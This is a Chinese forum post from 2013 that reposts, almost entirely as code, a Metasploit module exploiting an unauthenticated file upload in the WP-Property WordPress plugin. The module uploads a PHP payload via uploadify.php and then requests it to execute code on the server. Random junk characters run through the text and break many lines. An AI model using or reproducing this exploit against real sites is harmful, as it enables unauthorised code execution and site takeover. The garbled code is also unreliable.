WordPress WP-Property PHP 文件上传漏洞% C( X2 Y# U, j0 n3 b% a
* e/ f& Q. X, j P- s+ |4 C ## # This file is part of the Metasploit Framework and may be subject to- `! @; W5 i. d) a) v9 T' n: S
2 {+ s* f, e% O) g7 h* z5 ?5 l' Z
# redistribution and commercial restrictions. Please see the Metasploit- A; }( o$ [4 c9 G6 m% r' j
5 R1 i& R+ [& D0 L# S3 E# Framework web site for more information on licensing and terms of use.
* F4 Z8 b% o6 u8 i Q2 a9 |, j' P9 L+ i4 Q/ s4 u( [$ x" i+ |
# http://metasploit.com/framework/ ##
0 E+ @3 O y- @" @* n3 s0 M5 N" H6 o) Q
2 C/ L. h: a0 }# \. t
8 S+ V6 D) @# x% u l" u5 v& E
3 K# B" w' ?. y& }; i3 ~' a U
0 D ^# }! j9 } E9 ^" m# q) B3 }$ \require 'msf/core'
2 _# I# [# |* i/ jrequire 'msf/core/exploit/php_exe'
" V3 a/ b/ C% l2 X$ n/ Y h
. K1 y# ~6 f# u6 s7 Z( c9 lclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',; @, g7 C8 u5 P9 v5 v" ]$ F
'Description' => %q{0 @# Z1 j# n4 z5 J. p' H
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
4 }( M5 v* r! w* y5 ?" K+ y5 P[" S4 T3 l a( j [0 R. A/ i
'Sammy FORGIT', # initial discovery3 B1 p7 c9 i0 h
'James Fitts <fitts.james[at]gmail.com>' # metasploit module6 D$ C @4 O$ p, @; a2 M
],
A0 M& F" B. E2 |, @'License' => MSF_LICENSE,
* e5 G$ N: b% P# V0 w' d'References' =>
y5 I q8 E8 B6 N1 r" Z& |[
2 e8 L% N3 y! F% S( N# Y8 l1 z[ 'OSVDB', '82656' ],! ^+ q2 z: v: ^& b3 i$ W+ y8 E
[ 'BID', '53787' ], C! b- Y8 }# a
[ 'EDB', '18987'],
1 ]7 g3 h( k! O5 A0 J[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
1 w. P, S2 E9 T6 F, h- Y- n],
; ^4 Y# m7 U1 i8 _8 F'Payload' =>
$ f+ V8 j& Q. ^6 e9 {{
/ [# z8 P" E: K$ O'BadChars' => "\x00",! d9 t& y! ]0 i, h
},1 [( ~4 n* C [1 ]" }
'Platform' => 'php',
& S. m; @2 u n6 _* L6 K- }7 G6 D* m'Arch' => ARCH_PHP,9 y! ^' N/ ~% f6 t Q. C2 Y* {
'Targets' =>$ V4 w2 h% {, }/ [: }, V3 v% Z
[
B5 j6 a" c6 U; o[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],( k: P- e$ I9 D
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 [: T) c* n& |# B7 w
],( `9 `5 X7 p3 Y; [3 x& ^! T$ Z
'DefaultTarget' => 0,; L+ g& u- n# d; @
'DisclosureDate' => 'Mar 26 2012'))' R& A. ^+ F1 S* _
+ L. G2 C$ |7 J( |$ rregister_options(* q% K7 J( w0 @. w. A R
[
, o/ @) V( {, _0 ~4 p5 m( c' C1 _OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
3 L9 G. w. q1 X1 r9 Z], self.class)
4 x% \% {( S. y& Wend8 H' l, L$ e% Z8 U5 D9 `2 s
' z# [" h! f% o' g E) I6 a
def check
$ H4 i) Q S3 ?uri = target_uri.path+ n3 G# m6 o7 ?( a6 e: F5 o
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
2 X, Y5 A! V9 h6 H'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"5 w7 O; v4 t2 q$ Z
})
/ @ O, l2 A0 c! S* L2 f9 E$ k( P- W$ i9 O0 s
if not res or res.code != 200
" l( X) b/ L- U4 V. D' freturn Exploit::CheckCode::Unknown0 o& j6 c) s! T) q, f
end' R- {) i" O0 {
7 h4 L# @/ a! U1 T3 B5 N1 F7 y
return Exploit::CheckCode::Appears
/ I# J$ i( A& S5 D2 g; aend
& E4 p, E6 d( ]# |/ p2 H& B: D' Y8 p* m, `- U/ \
def exploit9 V9 a$ @& ?1 X% i$ m( \
uri = target_uri.path1 O% \3 j U" k& n# f
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)
6 @$ w; C8 w- q5 P" g; B4 {
; }# v5 C, [2 c/ Ddata = Rex::MIME::Message.new2 A, h% F1 }; J3 v6 f; R1 m
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
9 V: ~5 m, [4 j# X; idata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
: t( [% T# \! b. {) b, zpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
" j( }# C) G( A( u" n
: t6 u. `3 g" W# T! X [print_status("#{peer} - Uploading payload #{@payload_name}")" f c x. s4 ~
res = send_request_cgi({: u; w; _6 K% W* y% `5 I! _
'method' => 'POST',
' Z, m% r% y( _* p: ^& Q f5 o'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
1 f# y5 K6 F) K2 [' d) A'ctype' => "multipart/form-data; boundary=#{data.bound}",1 @# R% Y$ P4 ^6 E) M$ c0 z
'data' => post_data
# t& c2 N$ b$ h5 x* `$ a, X( g* Z})0 z' j" s! O# l0 e/ Z4 u0 D: j
4 R9 u$ R) b& k
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
( ?8 D! m4 E( f6 Bfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed"), }) K' k+ N2 T: E
end
, Y4 J2 a7 _) {: i( F; l
1 Y3 E0 }, M5 C; q. pupload_uri = res.body8 B. o% S) U+ Q/ D/ k8 s" e
0 z7 X$ T m" |; M) l
print_status("#{peer} - Executing payload #{@payload_name}")
& ^( Q; V. A# y+ H& Gres = send_request_raw({# i! O6 X0 F, j0 v
'uri' => upload_uri,
- j9 b1 F' D3 D'method' => 'GET'9 _6 N1 S% k3 u r4 r# V+ H! }7 I
})
7 q+ O$ D+ a/ F% P, z, F9 I4 fend
4 L9 \, [ d( y8 I: I! q9 w; w5 Z$ lend
: W9 h( h/ Y- A" e
3 s/ b1 N' L. ]; C f- A/ _( U不要问我这写的是什么 怎么利用 我是说msf.+ t, W% n3 h5 [: _; E, {0 S' P
$ }. N' t# I) E3 U1 x5 Y3 z |
发表于 2013-1-4 19:51:30
收藏
支持
反对